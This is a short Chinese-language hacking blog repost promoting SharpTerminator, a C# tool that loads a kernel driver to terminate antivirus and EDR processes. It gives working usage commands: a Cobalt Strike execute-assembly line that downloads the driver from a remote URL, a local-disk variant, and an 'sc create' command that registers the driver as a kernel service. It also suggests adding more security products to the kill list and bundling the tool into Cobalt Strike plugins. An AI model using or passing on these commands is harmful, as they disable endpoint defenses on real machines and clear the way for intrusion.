Csharp加载驱动干掉杀软进程

2023年6月24日02:54:36评论61 views字数 537阅读1分47秒阅读模式

工具介绍

基于@ZeroMemoryEx的Terminator项目写的一个C#版，可通过URL远程或本地加载方式干掉杀软。

我们可以在源代码自己添加一些其他AV/EDR进程再重新编译，还可以集成到CobaltStrike插件中使用。

使用方法

远程URL时驱动程序会下载到 C:WindowsTemp ，然后从那里加载。

从远程URL下载驱动程序并终止AV/EDR：

execute-assembly SharpTerminator.exe --url "http://remoteurl.com:80/Terminator.sys"

execute-assembly SharpTerminator.exe --disk "C:pathtodriverTerminator.sys"

太狠！Csharp加载驱动干掉杀软进程

已知问题

如果您收到“无法在受信任列表中注册进程！” 错误你应该手动添加服务：

sc create Terminator binPath= "C:pathtodriver.sys" type= kernel start= demand

下载地址

https://github.com/mertdas/SharpTerminator

原文始发于微信公众号（Hack分享吧）：太狠！Csharp加载驱动干掉杀软进程

如何使用MultCheck从静态分析结果中识别恶意字节数据